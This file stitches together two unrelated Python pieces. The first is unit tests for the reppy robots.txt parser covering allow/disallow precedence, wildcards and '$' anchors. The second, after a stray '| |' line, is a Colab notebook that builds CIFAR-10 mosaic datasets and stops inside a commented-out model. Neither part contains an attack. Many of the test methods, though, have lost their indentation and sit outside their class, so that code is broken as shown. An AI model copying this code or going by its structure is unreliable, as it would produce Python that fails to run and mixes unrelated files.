MYNAME = 'rogerbot'
class TestOldMozscape(unittest.TestCase):
    @staticmethod
    def parse(strng):
        '''Parse *strng* as a robots.txt body and return a reppy Rules
        object (URL, HTTP status and TTL are fixed test values).'''
        return reppy.parser.Rules('http://example.com/robots.txt', 200, strng, 0)
def test_wwwseomozorg(self):
robots_txt = ( "../resources.test/rep/www.seomoz.org\n"
"User-agent: *\n"
"Disallow: /blogdetail.php?ID=537\n"
"Disallow: /tracker\n"
"\n"
"Sitemap: http://www.seomoz.org/sitemap.xml.gz\n"
"Sitemap: http://files.wistia.com/sitemaps/seomoz_video_sitemap.xml\n" )
rules = self.parse(robots_txt)
# Basic functionality, and lack of case sensitivity.
for agent in [ 'reppy', 'rEpPy' ]:
self.assertTrue(rules.allowed("/blog", agent))
self.assertFalse(rules.allowed("/blogdetail.php?ID=537", agent))
self.assertFalse(rules.allowed("/tracker", agent))
def test_allowall(self):
rules = self.parse("User-agent: *\nDisallow:")
for agent in [ "reppy", "oijsdofijsdofijsodifj" ]:
self.assertTrue(rules.allowed("/", agent))
self.assertTrue(rules.allowed("/foo", agent))
self.assertTrue(rules.allowed("/foo.html", agent))
self.assertTrue(rules.allowed("/foo/bar", agent))
self.assertTrue(rules.allowed("/foo/bar.html", agent))
def test_disallowall(self):
rules = self.parse("User-agent: *\nDisallow: /\n")
for agent in [ "reppy", "oijsdofijsdofijsodifj" ]:
self.assertFalse(rules.allowed("/", agent))
self.assertFalse(rules.allowed("/foo", agent))
self.assertFalse(rules.allowed("/foo.html", agent))
self.assertFalse(rules.allowed("/foo/bar", agent))
self.assertFalse(rules.allowed("/foo/bar.html", agent))
def test_no_googlebot_folder(self):
robots_txt = ( "User-agent: Googlebot\n"
"Disallow: /no-google/\n" )
rules = self.parse(robots_txt)
self.assertFalse(rules.allowed("/no-google/", "googlebot"))
self.assertFalse(rules.allowed("/no-google/something", "googlebot"))
self.assertFalse(rules.allowed("/no-google/something.html", "googlebot"))
self.assertTrue(rules.allowed("/", "googlebot"))
self.assertTrue(rules.allowed("/somethingelse", "googlebot"))
def test_no_googlebot_file(self):
robots_txt = ( "User-agent: Googlebot\n"
"Disallow: /no-google/blocked-page.html\n" )
rules = self.parse(robots_txt)
self.assertFalse(rules.allowed("/no-google/blocked-page.html", "googlebot"))
self.assertTrue(rules.allowed("/", "googlebot"))
self.assertTrue(rules.allowed("/no-google", "googlebot"))
self.assertTrue(rules.allowed("/no-google/someotherfolder", "googlebot"))
self.assertTrue(rules.allowed("/no-google/someotherfolder/somefile", "googlebot"))
def test_rogerbot_only(self):
robots_txt = ( "User-agent: *\n"
"Disallow: /no-bots/block-all-bots-except-rogerbot-page.html \t\t\t\t\n"
"\n"
"User-agent: rogerbot\n"
"Allow: /no-bots/block-all-bots-except-rogerbot-page.html\n" )
rules = self.parse(robots_txt)
self.assertFalse(rules.allowed("/no-bots/block-all-bots-except-rogerbot-page.html", "notroger"))
self.assertTrue(rules.allowed("/", "notroger"))
self.assertTrue(rules.allowed("/no-bots/block-all-bots-except-rogerbot-page.html", "rogerbot"))
self.assertTrue(rules.allowed("/", "rogerbot"))
def test_allow_certain_pages_only(self):
robots_txt = ( "User-agent: *\n"
"Allow: /onepage.html\n"
"Allow: /oneotherpage.php\n"
"Disallow: /\n"
"Allow: /subfolder/page1.html\n"
"Allow: /subfolder/page2.php\n"
"Disallow: /subfolder/\n" )
rules = self.parse(robots_txt)
self.assertFalse(rules.allowed("/", "reppy"))
self.assertFalse(rules.allowed("/foo", "reppy"))
self.assertFalse(rules.allowed("/bar.html", "reppy"))
self.assertTrue(rules.allowed("/onepage.html", "reppy"))
self.assertTrue(rules.allowed("/oneotherpage.php", "reppy"))
self.assertFalse(rules.allowed("/subfolder", "reppy"))
self.assertFalse(rules.allowed("/subfolder/", "reppy"))
self.assertFalse(rules.allowed("/subfolder/aaaaa", "reppy"))
self.assertTrue(rules.allowed("/subfolder/page1.html", "reppy"))
self.assertTrue(rules.allowed("/subfolder/page2.php", "reppy"))
def test_no_gifs_or_jpgs(self):
robots_txt = ( "User-agent: *\n"
"Disallow: /*.gif$\n"
"Disallow: /*.jpg$\n" )
rules = self.parse(robots_txt)
self.assertTrue(rules.allowed("/", "reppy"))
self.assertTrue(rules.allowed("/foo", "reppy"))
self.assertTrue(rules.allowed("/foo.html", "reppy"))
self.assertTrue(rules.allowed("/foo/bar", "reppy"))
self.assertTrue(rules.allowed("/foo/bar.html", "reppy"))
self.assertFalse(rules.allowed("/test.jpg", "reppy"))
self.assertFalse(rules.allowed("/foo/test.jpg", "reppy"))
self.assertFalse(rules.allowed("/foo/bar/test.jpg", "reppy"))
self.assertTrue(rules.allowed("/the-jpg-extension-is-awesome.html", "reppy"))
# Edge cases where the wildcard could match in multiple places
self.assertFalse(rules.allowed("/jpg.jpg", "reppy"))
self.assertFalse(rules.allowed("/foojpg.jpg", "reppy"))
self.assertFalse(rules.allowed("/bar/foojpg.jpg", "reppy"))
self.assertFalse(rules.allowed("/.jpg.jpg", "reppy"))
self.assertFalse(rules.allowed("/.jpg/.jpg", "reppy"))
self.assertFalse(rules.allowed("/test.gif", "reppy"))
self.assertFalse(rules.allowed("/foo/test.gif", "reppy"))
self.assertFalse(rules.allowed("/foo/bar/test.gif", "reppy"))
self.assertTrue(rules.allowed("/the-gif-extension-is-awesome.html", "reppy"))
def test_block_subdirectory_wildcard(self):
robots_txt = ( "User-agent: *\n"
"Disallow: /private*/\n" )
rules = self.parse(robots_txt)
self.assertTrue(rules.allowed("/", "reppy"))
self.assertTrue(rules.allowed("/foo", "reppy"))
self.assertTrue(rules.allowed("/foo.html", "reppy"))
self.assertTrue(rules.allowed("/foo/bar", "reppy"))
self.assertTrue(rules.allowed("/foo/bar.html", "reppy"))
# Disallow clause ends with a slash, so these shouldn't match
self.assertTrue(rules.allowed("/private", "reppy"))
self.assertTrue(rules.allowed("/privates", "reppy"))
self.assertTrue(rules.allowed("/privatedir", "reppy"))
self.assertFalse(rules.allowed("/private/", "reppy"))
self.assertFalse(rules.allowed("/private/foo", "reppy"))
self.assertFalse(rules.allowed("/private/foo/bar.html", "reppy"))
self.assertFalse(rules.allowed("/privates/", "reppy"))
self.assertFalse(rules.allowed("/privates/foo", "reppy"))
self.assertFalse(rules.allowed("/privates/foo/bar.html", "reppy"))
self.assertFalse(rules.allowed("/privatedir/", "reppy"))
self.assertFalse(rules.allowed("/privatedir/foo", "reppy"))
self.assertFalse(rules.allowed("/privatedir/foo/bar.html", "reppy"))
def test_block_urls_with_question_marks(self):
robots_txt = ( "User-agent: *\n"
"Disallow: /*?\n" )
rules = self.parse(robots_txt)
self.assertTrue(rules.allowed("/", "reppy"))
self.assertTrue(rules.allowed("/foo", "reppy"))
self.assertTrue(rules.allowed("/foo.html", "reppy"))
self.assertTrue(rules.allowed("/foo/bar", "reppy"))
self.assertTrue(rules.allowed("/foo/bar.html", "reppy"))
self.assertFalse(rules.allowed("/?", "reppy"))
self.assertFalse(rules.allowed("/foo?q=param", "reppy"))
self.assertFalse(rules.allowed("/foo.html?q=param", "reppy"))
self.assertFalse(rules.allowed("/foo/bar?q=param", "reppy"))
self.assertFalse(rules.allowed("/foo/bar.html?q=param&bar=baz", "reppy"))
def test_no_question_marks_except_at_end(self):
robots_txt = ( "User-agent: *\n"
"Allow: /*?$\n"
"Disallow: /*?\n" )
rules = self.parse(robots_txt)
self.assertTrue(rules.allowed("/", "reppy"))
self.assertTrue(rules.allowed("/foo", "reppy"))
self.assertTrue(rules.allowed("/foo.html", "reppy"))
self.assertTrue(rules.allowed("/foo/bar", "reppy"))
self.assertTrue(rules.allowed("/foo/bar.html", "reppy"))
self.assertTrue(rules.allowed("/?", "reppy"))
self.assertTrue(rules.allowed("/foo/bar.html?", "reppy"))
self.assertFalse(rules.allowed("/foo?q=param", "reppy"))
self.assertFalse(rules.allowed("/foo.html?q=param", "reppy"))
self.assertFalse(rules.allowed("/foo/bar?q=param", "reppy"))
self.assertFalse(rules.allowed("/foo/bar.html?q=param&bar=baz", "reppy"))
def test_wildcard_edge_cases(self):
robots_txt = ( "User-agent: *\n"
"Disallow: /*one\n"
"Disallow: /two*three\n"
"Disallow: /irrelevant/four*five\n"
"Disallow: /six*\n"
"Disallow: /foo/*/seven*/eight*nine\n"
"Disallow: /foo/*/*ten$\n"
"\n"
"Disallow: /*products/default.aspx\n"
"Disallow: /*/feed/$\n" )
rules = self.parse(robots_txt)
self.assertTrue(rules.allowed("/", "reppy"))
self.assertTrue(rules.allowed("/foo", "reppy"))
self.assertTrue(rules.allowed("/foo.html", "reppy"))
self.assertTrue(rules.allowed("/foo/bar", "reppy"))
self.assertTrue(rules.allowed("/foo/bar.html", "reppy"))
self.assertFalse(rules.allowed("/one", "reppy"))
self.assertFalse(rules.allowed("/aaaone", "reppy"))
self.assertFalse(rules.allowed("/aaaaoneaaa", "reppy"))
self.assertFalse(rules.allowed("/oneaaaa", "reppy"))
self.assertFalse(rules.allowed("/twothree", "reppy"))
self.assertFalse(rules.allowed("/twoaaathree", "reppy"))
self.assertFalse(rules.allowed("/twoaaaathreeaaa", "reppy"))
self.assertFalse(rules.allowed("/twothreeaaa", "reppy"))
self.assertFalse(rules.allowed("/irrelevant/fourfive", "reppy"))
self.assertFalse(rules.allowed("/irrelevant/fouraaaafive", "reppy"))
self.assertFalse(rules.allowed("/irrelevant/fouraaafiveaaaa", "reppy"))
self.assertFalse(rules.allowed("/irrelevant/fourfiveaaa", "reppy"))
self.assertFalse(rules.allowed("/six", "reppy"))
self.assertFalse(rules.allowed("/sixaaaa", "reppy"))
self.assertFalse(rules.allowed("/products/default.aspx", "reppy"))
self.assertFalse(rules.allowed("/author/admin/feed/", "reppy"))
def test_allow_edge_cases(self):
    """Allow directives (with assorted tab/space separators) must override
    Disallow rules according to rule-length precedence."""
    robots_txt = ( "User-agent: *\n"
                   "Disallow:\t/somereallylongfolder/\n"
                   "Allow:\t\t/*.jpg\n"
                   "\n"
                   "Disallow:\t/sales-secrets.php\n"
                   "Allow: \t\t/sales-secrets.php\n"
                   "\n"
                   "Disallow:\t/folder\n"
                   "Allow:\t\t/folder/\n"
                   "\n"
                   "Allow:\t\t/folder2\n"
                   "Disallow:\t/folder2/\n" )
    parser = self.parse(robots_txt)
    # The long Disallow outranks the shorter "/*.jpg" Allow.
    for path in ("/somereallylongfolder/",
                 "/somereallylongfolder/aaaa",
                 "/somereallylongfolder/test.jpg"):
        self.assertFalse(parser.allowed(path, "reppy"))
    # Equal-length Allow wins; the longer "/folder/" Allow wins.
    for path in ("/sales-secrets.php", "/folder/page", "/folder/page2"):
        self.assertTrue(parser.allowed(path, "reppy"))
def test_redundant_allow(self):
    """A blanket "Allow: /" must not defeat longer, more specific
    Disallow rules."""
    robots_txt = ( "User-agent: *\n"
                   "Disallow: /en/\n"
                   "Disallow: /files/documentation/\n"
                   "Disallow: /files/\n"
                   "Disallow: /de/careers/\n"
                   "Disallow: /images/\n"
                   "\n"
                   "Disallow: /print_mode.yes/\n"
                   "Disallow: /?product=lutensit&print_mode=yes&googlebot=nocrawl\n"
                   "Allow: /\n"
                   "Disallow: /search/\n" )
    parser = self.parse(robots_txt)
    for path in ("/print_mode.yes/", "/print_mode.yes/foo",
                 "/search/", "/search/foo"):
        self.assertFalse(parser.allowed(path, "reppy"))
# Some comments, wildcards, and anchor tests -- this was a legacy test
# ported from urlexclude
def test_legacy_test_1(self):
    """Inline comments, wildcards and $ anchors together
    (legacy test ported from urlexclude)."""
    robots_txt = ( "user-agent: * #a comment!\n"
                   "disallow: /Blerf\n"
                   "disallow: /Blerg$\n"
                   "disallow: /blerf/*/print.html$#a comment\n"
                   "disallow: /blerf/*/blim/blerf$\n"
                   "disallow: /plerf/*/blim/blim$\n"
                   "\tuser-agent: BLERF\n"
                   "  DisALLOW:  \tblerfPage\n"
                   "blerf:blah\n" )
    parser = self.parse(robots_txt)
    # $-anchored rules do not match longer paths; query strings defeat "$".
    for path in ("/Blerg/blah", "/blerf/blah",
                 "/blerf/some/subdirs/print.html?extra=stuff"):
        self.assertTrue(parser.allowed(path, "reppy"))
    # Unanchored prefix rules and wildcard+$ rules still block these.
    for path in ("/Blerf/blah", "/Blerg",
                 "/blerf/some/subdirs/print.html",
                 "/blerf/some/sub/dirs/blim/blim/blerf",
                 "/plerf/some/sub/dirs/blim/blim"):
        self.assertFalse(parser.allowed(path, "reppy"))
def test_legacy_test_2(self):
    """Google-style robots.txt with many similar rules: a root query-string
    URL must be caught by "Disallow: /?" (legacy test ported from
    urlexclude)."""
    robots_txt = ( "User-agent: *\n"
                   "Allow: /searchhistory/\n"
                   "Disallow: /news?output=xhtml&\n"
                   "Allow: /news?output=xhtml\n"
                   "Disallow: /search\n"
                   "Disallow: /groups\n"
                   "Disallow: /images\n"
                   "Disallow: /catalogs\n"
                   "Disallow: /catalogues\n"
                   "Disallow: /news\n"
                   "Disallow: /nwshp\n"
                   "Allow: /news?btcid=\n"
                   "Disallow: /news?btcid=*&\n"
                   "Allow: /news?btaid=\n"
                   "Disallow: /news?btaid=*&\n"
                   "Disallow: /?\n"
                   "Disallow: /addurl/image?\n"
                   "Disallow: /pagead/\n"
                   "Disallow: /relpage/\n"
                   "Disallow: /relcontent\n"
                   "Disallow: /sorry/\n"
                   "Disallow: /imgres\n"
                   "Disallow: /keyword/\n"
                   "Disallow: /u/\n"
                   "Disallow: /univ/\n"
                   "Disallow: /cobrand\n"
                   "Disallow: /custom\n"
                   "Disallow: /advanced_group_search\n"
                   "Disallow: /advanced_search\n"
                   "Disallow: /googlesite\n"
                   "Disallow: /preferences\n"
                   "Disallow: /setprefs\n"
                   "Disallow: /swr\n"
                   "Disallow: /url\n"
                   "Disallow: /default\n"
                   "Disallow: /m?\n"
                   "Disallow: /m/?\n"
                   "Disallow: /m/lcb\n"
                   "Disallow: /m/search?\n"
                   "Disallow: /wml?\n"
                   "Disallow: /wml/?\n"
                   "Disallow: /wml/search?\n"
                   "Disallow: /xhtml?\n"
                   "Disallow: /xhtml/?\n"
                   "Disallow: /xhtml/search?\n"
                   "Disallow: /xml?\n"
                   "Disallow: /imode?\n"
                   "Disallow: /imode/?\n"
                   "Disallow: /imode/search?\n"
                   "Disallow: /jsky?\n"
                   "Disallow: /jsky/?\n"
                   "Disallow: /jsky/search?\n"
                   "Disallow: /pda?\n"
                   "Disallow: /pda/?\n"
                   "Disallow: /pda/search?\n"
                   "Disallow: /sprint_xhtml\n"
                   "Disallow: /sprint_wml\n"
                   "Disallow: /pqa\n"
                   "Disallow: /palm\n"
                   "Disallow: /gwt/\n"
                   "Disallow: /purchases\n"
                   "Disallow: /hws\n"
                   "Disallow: /bsd?\n"
                   "Disallow: /linux?\n"
                   "Disallow: /mac?\n"
                   "Disallow: /microsoft?\n"
                   "Disallow: /unclesam?\n"
                   "Disallow: /answers/search?q=\n"
                   "Disallow: /local?\n"
                   "Disallow: /local_url\n"
                   "Disallow: /froogle?\n"
                   "Disallow: /products?\n"
                   "Disallow: /froogle_\n"
                   "Disallow: /product_\n"
                   "Disallow: /products_\n"
                   "Disallow: /print\n"
                   "Disallow: /books\n"
                   "Disallow: /patents?\n"
                   "Disallow: /scholar?\n"
                   "Disallow: /complete\n"
                   "Disallow: /sponsoredlinks\n"
                   "Disallow: /videosearch?\n"
                   "Disallow: /videopreview?\n"
                   "Disallow: /videoprograminfo?\n"
                   "Disallow: /maps?\n"
                   "Disallow: /mapstt?\n"
                   "Disallow: /mapslt?\n"
                   "Disallow: /maps/stk/\n"
                   "Disallow: /mapabcpoi?\n"
                   "Disallow: /translate?\n"
                   "Disallow: /ie?\n"
                   "Disallow: /sms/demo?\n"
                   "Disallow: /katrina?\n"
                   "Disallow: /blogsearch?\n"
                   "Disallow: /blogsearch/\n"
                   "Disallow: /blogsearch_feeds\n"
                   "Disallow: /advanced_blog_search\n"
                   "Disallow: /reader/\n"
                   "Disallow: /uds/\n"
                   "Disallow: /chart?\n"
                   "Disallow: /transit?\n"
                   "Disallow: /mbd?\n"
                   "Disallow: /extern_js/\n"
                   "Disallow: /calendar/feeds/\n"
                   "Disallow: /calendar/ical/\n"
                   "Disallow: /cl2/feeds/\n"
                   "Disallow: /cl2/ical/\n"
                   "Disallow: /coop/directory\n"
                   "Disallow: /coop/manage\n"
                   "Disallow: /trends?\n"
                   "Disallow: /trends/music?\n"
                   "Disallow: /notebook/search?\n"
                   "Disallow: /music\n"
                   "Disallow: /browsersync\n"
                   "Disallow: /call\n"
                   "Disallow: /archivesearch?\n"
                   "Disallow: /archivesearch/url\n"
                   "Disallow: /archivesearch/advanced_search\n"
                   "Disallow: /base/search?\n"
                   "Disallow: /base/reportbadoffer\n"
                   "Disallow: /base/s2\n"
                   "Disallow: /urchin_test/\n"
                   "Disallow: /movies?\n"
                   "Disallow: /codesearch?\n"
                   "Disallow: /codesearch/feeds/search?\n"
                   "Disallow: /wapsearch?\n"
                   "Disallow: /safebrowsing\n"
                   "Disallow: /reviews/search?\n"
                   "Disallow: /orkut/albums\n"
                   "Disallow: /jsapi\n"
                   "Disallow: /views?\n"
                   "Disallow: /c/\n"
                   "Disallow: /cbk\n"
                   "Disallow: /recharge/dashboard/car\n"
                   "Disallow: /recharge/dashboard/static/\n"
                   "Disallow: /translate_c?\n"
                   "Disallow: /s2/profiles/me\n"
                   "Allow: /s2/profiles\n"
                   "Disallow: /s2\n"
                   "Disallow: /transconsole/portal/\n"
                   "Disallow: /gcc/\n"
                   "Disallow: /aclk\n"
                   "Disallow: /cse?\n"
                   "Disallow: /tbproxy/\n"
                   "Disallow: /MerchantSearchBeta/\n"
                   "Disallow: /ime/\n"
                   "Disallow: /websites?\n"
                   "Disallow: /shenghuo/search?\n" )
    rules = self.parse(robots_txt)
    # The "Disallow: /?" rule blocks any root URL carrying a query string.
    self.assertFalse(rules.allowed("/?as_q=ethics&ie=UTF-8&ui=blg&bl_url=centrerion.blogspot.com&x=0&y=0&ui=blg", "reppy"))
# Real world example with several similar disallow rules
def test_legacy_test_3(self):
    """Same Google-style rule set as test_legacy_test_2, exercising the
    unanchored "Disallow: /archivesearch?" rule against a long query URL
    (real-world example with several similar disallow rules)."""
    robots_txt = ( "User-agent: *\n"
                   "Allow: /searchhistory/\n"
                   "Disallow: /news?output=xhtml&\n"
                   "Allow: /news?output=xhtml\n"
                   "Disallow: /search\n"
                   "Disallow: /groups\n"
                   "Disallow: /images\n"
                   "Disallow: /catalogs\n"
                   "Disallow: /catalogues\n"
                   "Disallow: /news\n"
                   "Disallow: /nwshp\n"
                   "Allow: /news?btcid=\n"
                   "Disallow: /news?btcid=*&\n"
                   "Allow: /news?btaid=\n"
                   "Disallow: /news?btaid=*&\n"
                   "Disallow: /?\n"
                   "Disallow: /addurl/image?\n"
                   "Disallow: /pagead/\n"
                   "Disallow: /relpage/\n"
                   "Disallow: /relcontent\n"
                   "Disallow: /sorry/\n"
                   "Disallow: /imgres\n"
                   "Disallow: /keyword/\n"
                   "Disallow: /u/\n"
                   "Disallow: /univ/\n"
                   "Disallow: /cobrand\n"
                   "Disallow: /custom\n"
                   "Disallow: /advanced_group_search\n"
                   "Disallow: /advanced_search\n"
                   "Disallow: /googlesite\n"
                   "Disallow: /preferences\n"
                   "Disallow: /setprefs\n"
                   "Disallow: /swr\n"
                   "Disallow: /url\n"
                   "Disallow: /default\n"
                   "Disallow: /m?\n"
                   "Disallow: /m/?\n"
                   "Disallow: /m/lcb\n"
                   "Disallow: /m/search?\n"
                   "Disallow: /wml?\n"
                   "Disallow: /wml/?\n"
                   "Disallow: /wml/search?\n"
                   "Disallow: /xhtml?\n"
                   "Disallow: /xhtml/?\n"
                   "Disallow: /xhtml/search?\n"
                   "Disallow: /xml?\n"
                   "Disallow: /imode?\n"
                   "Disallow: /imode/?\n"
                   "Disallow: /imode/search?\n"
                   "Disallow: /jsky?\n"
                   "Disallow: /jsky/?\n"
                   "Disallow: /jsky/search?\n"
                   "Disallow: /pda?\n"
                   "Disallow: /pda/?\n"
                   "Disallow: /pda/search?\n"
                   "Disallow: /sprint_xhtml\n"
                   "Disallow: /sprint_wml\n"
                   "Disallow: /pqa\n"
                   "Disallow: /palm\n"
                   "Disallow: /gwt/\n"
                   "Disallow: /purchases\n"
                   "Disallow: /hws\n"
                   "Disallow: /bsd?\n"
                   "Disallow: /linux?\n"
                   "Disallow: /mac?\n"
                   "Disallow: /microsoft?\n"
                   "Disallow: /unclesam?\n"
                   "Disallow: /answers/search?q=\n"
                   "Disallow: /local?\n"
                   "Disallow: /local_url\n"
                   "Disallow: /froogle?\n"
                   "Disallow: /products?\n"
                   "Disallow: /froogle_\n"
                   "Disallow: /product_\n"
                   "Disallow: /products_\n"
                   "Disallow: /print\n"
                   "Disallow: /books\n"
                   "Disallow: /patents?\n"
                   "Disallow: /scholar?\n"
                   "Disallow: /complete\n"
                   "Disallow: /sponsoredlinks\n"
                   "Disallow: /videosearch?\n"
                   "Disallow: /videopreview?\n"
                   "Disallow: /videoprograminfo?\n"
                   "Disallow: /maps?\n"
                   "Disallow: /mapstt?\n"
                   "Disallow: /mapslt?\n"
                   "Disallow: /maps/stk/\n"
                   "Disallow: /mapabcpoi?\n"
                   "Disallow: /translate?\n"
                   "Disallow: /ie?\n"
                   "Disallow: /sms/demo?\n"
                   "Disallow: /katrina?\n"
                   "Disallow: /blogsearch?\n"
                   "Disallow: /blogsearch/\n"
                   "Disallow: /blogsearch_feeds\n"
                   "Disallow: /advanced_blog_search\n"
                   "Disallow: /reader/\n"
                   "Disallow: /uds/\n"
                   "Disallow: /chart?\n"
                   "Disallow: /transit?\n"
                   "Disallow: /mbd?\n"
                   "Disallow: /extern_js/\n"
                   "Disallow: /calendar/feeds/\n"
                   "Disallow: /calendar/ical/\n"
                   "Disallow: /cl2/feeds/\n"
                   "Disallow: /cl2/ical/\n"
                   "Disallow: /coop/directory\n"
                   "Disallow: /coop/manage\n"
                   "Disallow: /trends?\n"
                   "Disallow: /trends/music?\n"
                   "Disallow: /notebook/search?\n"
                   "Disallow: /music\n"
                   "Disallow: /browsersync\n"
                   "Disallow: /call\n"
                   "Disallow: /archivesearch?\n"
                   "Disallow: /archivesearch/url\n"
                   "Disallow: /archivesearch/advanced_search\n"
                   "Disallow: /base/search?\n"
                   "Disallow: /base/reportbadoffer\n"
                   "Disallow: /base/s2\n"
                   "Disallow: /urchin_test/\n"
                   "Disallow: /movies?\n"
                   "Disallow: /codesearch?\n"
                   "Disallow: /codesearch/feeds/search?\n"
                   "Disallow: /wapsearch?\n"
                   "Disallow: /safebrowsing\n"
                   "Disallow: /reviews/search?\n"
                   "Disallow: /orkut/albums\n"
                   "Disallow: /jsapi\n"
                   "Disallow: /views?\n"
                   "Disallow: /c/\n"
                   "Disallow: /cbk\n"
                   "Disallow: /recharge/dashboard/car\n"
                   "Disallow: /recharge/dashboard/static/\n"
                   "Disallow: /translate_c?\n"
                   "Disallow: /s2/profiles/me\n"
                   "Allow: /s2/profiles\n"
                   "Disallow: /s2\n"
                   "Disallow: /transconsole/portal/\n"
                   "Disallow: /gcc/\n"
                   "Disallow: /aclk\n"
                   "Disallow: /cse?\n"
                   "Disallow: /tbproxy/\n"
                   "Disallow: /MerchantSearchBeta/\n"
                   "Disallow: /ime/\n"
                   "Disallow: /websites?\n"
                   "Disallow: /shenghuo/search?\n" )
    rules = self.parse(robots_txt)
    # "Disallow: /archivesearch?" matches the path plus any query string.
    self.assertFalse(rules.allowed("/archivesearch?q=stalin&scoring=t&hl=en&sa=N&sugg=d&as_ldate=1900&as_hdate=1919&lnav=hist2", "reppy"))
# Real world example
def test_legacy_test_4(self):
robots_txt = ( "User-agent: scooter\n"
"Disallow: /\n"
"\n"
"User-agent: wget\n"
"User-agent: webzip\n"
"Disallow: /\n"
| |
# -*- coding: utf-8 -*-
"""4_focus_random_classify_random_train_classify.ipynb
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/1pHaGvxPWtFJXolLP6BXSnxm-_rZpiWB5
"""
from google.colab import drive
drive.mount('/content/drive')
import torch.nn as nn
import torch.nn.functional as F
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import torch
import torchvision
import torchvision.transforms as transforms
from torch.utils.data import Dataset, DataLoader
from torchvision import transforms, utils
from matplotlib import pyplot as plt
import copy
# Ignore warnings
import warnings
warnings.filterwarnings("ignore")
# Normalise CIFAR-10 images from [0, 1] to [-1, 1] per channel.
transform = transforms.Compose(
    [transforms.ToTensor(),
     transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])
trainset = torchvision.datasets.CIFAR10(root='./data', train=True, download=True, transform=transform)
testset = torchvision.datasets.CIFAR10(root='./data', train=False, download=True, transform=transform)
trainloader = torch.utils.data.DataLoader(trainset, batch_size=10, shuffle=True)
testloader = torch.utils.data.DataLoader(testset, batch_size=10, shuffle=False)
classes = ('plane', 'car', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck')
# The first three classes are "foreground" targets of the mosaic task;
# the remaining seven provide distractor "background" tiles.
foreground_classes = {'plane', 'car', 'bird'}
background_classes = {'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck'}
# Label base offsets: foreground CIFAR labels 0, 1, 2 map to mosaic labels 0, 1, 2.
fg1, fg2, fg3 = 0, 1, 2
# Split all 50k CIFAR-10 training images (5000 batches of 10) into a
# foreground pool (plane/car/bird) and a background pool (other classes).
dataiter = iter(trainloader)
background_data = []
background_label = []
foreground_data = []
foreground_label = []
batch_size = 10
for i in range(5000):
    # `next(dataiter)` replaces the legacy `dataiter.next()` method, which
    # was removed from DataLoader iterators (Python iterator protocol).
    images, labels = next(dataiter)
    for j in range(batch_size):
        img = images[j].tolist()
        if classes[labels[j]] in background_classes:
            background_data.append(img)
            background_label.append(labels[j])
        else:
            foreground_data.append(img)
            foreground_label.append(labels[j])
# Re-materialise the pools as tensors for fast indexing later.
foreground_data = torch.tensor(foreground_data)
foreground_label = torch.tensor(foreground_label)
background_data = torch.tensor(background_data)
background_label = torch.tensor(background_label)
def create_mosaic_img(bg_idx, fg_idx, fg):
    """
    Assemble one 3x3 mosaic: eight background tiles and one foreground tile.

    bg_idx : list of indexes of background_data[] to be used as background images in mosaic
    fg_idx : index of image to be used as foreground image from foreground data
    fg : at what position/index foreground image has to be stored out of 0-8

    Returns (image_list, label): a stacked (9, 3, 32, 32) tensor and the
    foreground class label shifted down to the 0-2 range.
    """
    image_list = []
    j = 0  # next unused entry of bg_idx
    for i in range(9):
        if i != fg:
            image_list.append(background_data[bg_idx[j]])
            j += 1
        else:
            image_list.append(foreground_data[fg_idx])
    # Shift by fg1 (== 0 here) so mosaic labels start at 0 regardless of
    # which CIFAR classes were chosen as foreground.
    label = foreground_label[fg_idx] - fg1
    image_list = torch.stack(image_list)
    return image_list, label
# Build 30000 training mosaics; the per-iteration seed makes the set reproducible.
desired_num = 30000
mosaic_list_of_images = []  # each mosaic image is saved as a stack of 9 tiles
fore_idx = []  # position (0-8) of the foreground tile within each mosaic
mosaic_label = []  # label of mosaic image = foreground class present in that mosaic
for i in range(desired_num):
    np.random.seed(i)
    # NOTE(review): the bounds assume >= 35000 background and >= 15000
    # foreground images were collected above -- TODO confirm the CIFAR
    # class split (7 x 5000 vs 3 x 5000) guarantees this.
    bg_idx = np.random.randint(0, 35000, 8)
    fg_idx = np.random.randint(0, 15000)
    fg = np.random.randint(0, 9)
    fore_idx.append(fg)
    image_list, label = create_mosaic_img(bg_idx, fg_idx, fg)
    mosaic_list_of_images.append(image_list)
    mosaic_label.append(label)
class MosaicDataset(Dataset):
    """Dataset of pre-built mosaics.

    Each item is the triple (mosaic, label, foreground_index), where the
    foreground index is the tile position (0-8) of the foreground image.
    """

    def __init__(self, mosaic_list_of_images, mosaic_label, fore_idx):
        """
        Args:
            mosaic_list_of_images: sequence of mosaics (9 stacked tiles each).
            mosaic_label: foreground class label per mosaic.
            fore_idx: foreground tile position (0-8) per mosaic.
        """
        self.mosaic = mosaic_list_of_images
        self.label = mosaic_label
        self.fore_idx = fore_idx

    def __len__(self):
        """Number of mosaics held by the dataset."""
        return len(self.label)

    def __getitem__(self, idx):
        """Return the (mosaic, label, foreground_index) triple at ``idx``."""
        return self.mosaic[idx], self.label[idx], self.fore_idx[idx]
# Mini-batch size for mosaic training.  NOTE(review): Focus.forward
# pre-allocates buffers of exactly this size, so the loader must never
# yield a short final batch (30000 % 250 == 0 here).
batch = 250
msd = MosaicDataset(mosaic_list_of_images, mosaic_label, fore_idx)
train_loader = DataLoader(msd, batch_size=batch, shuffle=True)
# class Focus(nn.Module):
# def __init__(self):
# super(Focus, self).__init__()
# self.conv1 = nn.Conv2d(in_channels=3, out_channels=32, kernel_size=3, padding=0)
# self.conv2 = nn.Conv2d(in_channels=32, out_channels=64, kernel_size=3, padding=0)
# self.conv3 = nn.Conv2d(in_channels=64, out_channels=128, kernel_size=3, padding=0)
# self.conv4 = nn.Conv2d(in_channels=128, out_channels=128, kernel_size=3, padding=0)
# self.conv5 = nn.Conv2d(in_channels=128, out_channels=128, kernel_size=3, padding=0)
# self.conv6 = nn.Conv2d(in_channels=128, out_channels=128, kernel_size=3, padding=1)
# self.pool = nn.MaxPool2d(kernel_size=2, stride=2)
# self.batch_norm1 = nn.BatchNorm2d(32)
# self.batch_norm2 = nn.BatchNorm2d(128)
# self.dropout1 = nn.Dropout2d(p=0.05)
# self.dropout2 = nn.Dropout2d(p=0.1)
# self.fc1 = nn.Linear(128,64)
# self.fc2 = nn.Linear(64, 32)
# self.fc3 = nn.Linear(32, 10)
# self.fc4 = nn.Linear(10, 2)
# def forward(self, x):
# x = self.conv1(x)
# x = F.relu(self.batch_norm1(x))
# x = (F.relu(self.conv2(x)))
